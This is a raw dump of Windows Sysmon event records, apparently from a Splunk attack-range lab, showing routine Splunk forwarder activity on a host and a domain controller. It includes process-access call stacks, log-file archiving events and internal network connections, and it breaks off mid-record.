AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001051869Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:28.091{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=50224E682CE540C3D7C84FDA153C6094,SHA256=88A36CF6301702D374E30A0C7CEA00407D67C6F6055E45B331B6A3A568E81E13,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x8000000000000000808915Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:28.374{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F660-60EB-AA79-00000000D001}2544C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808914Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:28.374{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808913Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:59:28.374{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808912Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:28.374{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808911Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:59:28.374{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808910Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:28.374{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808909Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:59:28.374{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808908Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:28.374{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808907Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:59:28.374{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808906Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:28.374{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808905Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:59:28.374{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F660-60EB-AA79-00000000D001}2544C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808904Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:28.374{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F660-60EB-AA79-00000000D001}2544C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808903Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:28.359{0C1E0330-F660-60EB-AA79-00000000D001}2544C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000808902Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:28.124{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C97C5F9FBDFA425F08137179060CC8FE,SHA256=D1574A961A5241B4839CB3582B7EC9BB952BD97CF6BD3D0A230E72DF578CEFCB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808901Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:28.124{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=022EE631D13E03E3E0B6A65244A6E37B,SHA256=BAE1F2F2A5324F5BE1308507E66CF27A9730B724DD45B2FAF83172440528D29B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808917Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:29.389{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2832534291EAB6DE5DFFB5D550A19499,SHA256=8EC9826EE2A594F1A73E359E173BF3631491C7D62F3AEC5175C9966322C6FBF6,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000808916Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:29.139{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ABC2C6F326D93C419E9696603BBE8025,SHA256=97D71B731B34F6420FFA469FCCD6AE64E6757B26724A1165A39EEA33BA95E8B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051870Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:29.106{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7427C864B499C842ED63A10D6888C4B5,SHA256=8F6D7D662A42CD516BC4BCA76546B51F765D891FF31369D41895D34098BA4A5C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808920Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:29.319{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57358-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808919Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:30.171{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ABBB02D7F48664F8534B799756670E2A,SHA256=F164D1AE43D9E14DFFA7E11B6CD33309A70EBDFC2F37383A64F5E5D2ACE976FB,IMPHASH=00000000000000000000000000000000falsetrue 
354300x80000000000000001051872Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:22.695{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51134-false10.0.1.12-8000- 23542300x80000000000000001051871Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:30.121{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F444E19FF0DF03C26436BFD192F7A85A,SHA256=26E85A82CC7C15C825E9EF8C8951C911CEC3AF7EA013C6BAD0FEC4ABC46527E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808918Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:30.155{0C1E0330-0490-60E8-1200-00000000D001}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=9550E5D8EC5D50B0221832A90B88DADB,SHA256=998AF4EF0D1FEF051D35DC86CE825BE0F7B95900CE296E85251287389365FB62,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051873Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:31.138{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3EDAC143111F35DEDAC828E6520A07B7,SHA256=462964A7EB67ECB74554D2C4C0B661C44734CD9D308C7C9E54308E9A32942D59,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808921Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:59:31.171{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CDBC15FF40772A3D4C88121483A1AA85,SHA256=8D2637FFFD3270AED8F73D764E47390E84464DFA18565EB0330CD0663E4F4CB6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051874Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:32.157{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1EE128764A0C00AE4BAD7DD4F55403D2,SHA256=895D9680A292D08AA39113539018C3349DB1AAEEBDC5BA49BA8E32CDA741509B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808922Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:32.218{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C521AC9098658E2FD61425C4A63DE141,SHA256=89C71B19603884E145FA0ED7BDD31FBEBD07F7EC5A7AC414D969C03948947284,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051876Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:59:33.356{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-02AF-60E8-0C00-00000000CF01}844C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051875Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:33.172{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=195D1049FE36734B95BA31B01C3CA140,SHA256=F0743CF9F68B37EEA4BF1A5995E1320BF973B8151A0F29DA32C3DEC01D2BEF3A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808923Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:33.218{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD543842116C7DD561E0FA3BCD3DEEDA,SHA256=78AB92E96A541D20DB8735F56FA559F9B0D7737D816C941183FC1ED86CE77EC6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808924Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:34.233{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D50035EAA2D6B2871BCBC576D530B60E,SHA256=A9AEF221EF33ACCD5888D5F8726723076D3968A7D3BA5C88D1B518454CA7DA4E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051877Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:34.187{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE73900914760DC00A23C8988A669E41,SHA256=0D91AA350FA046E8551D4F3D53BA306A7162228A04C3F20BD8EECB594D2560D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051878Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:35.202{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49FDF1C54A333BB057B3E9657A8C306E,SHA256=3331C159CF5BF0833C478AA8095D46419573961EF82B0D02AC1A1B75E171186B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808925Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:35.253{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1580C22A7DCB910B61D324CAC7BBA0AD,SHA256=5B501671BD57375693574D079E6609416FE02CB77D905E998351A5A30C557E33,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051880Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:28.653{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51135-false10.0.1.12-8000- 23542300x80000000000000001051879Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:36.235{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B0B48DA87E158637FDD235E8E77B5A4,SHA256=CE1AE8C16B396310814DF170D565BB466E8FDB63053BB8BDB6EE56408EFCE9B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808926Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:36.268{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08D54D1D31B3843211F32F6FDE28C203,SHA256=474C4A3CE2D4E2F5654BBC46157273BE4943BB6216B54353D969C69EF454D985,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051881Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:37.253{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 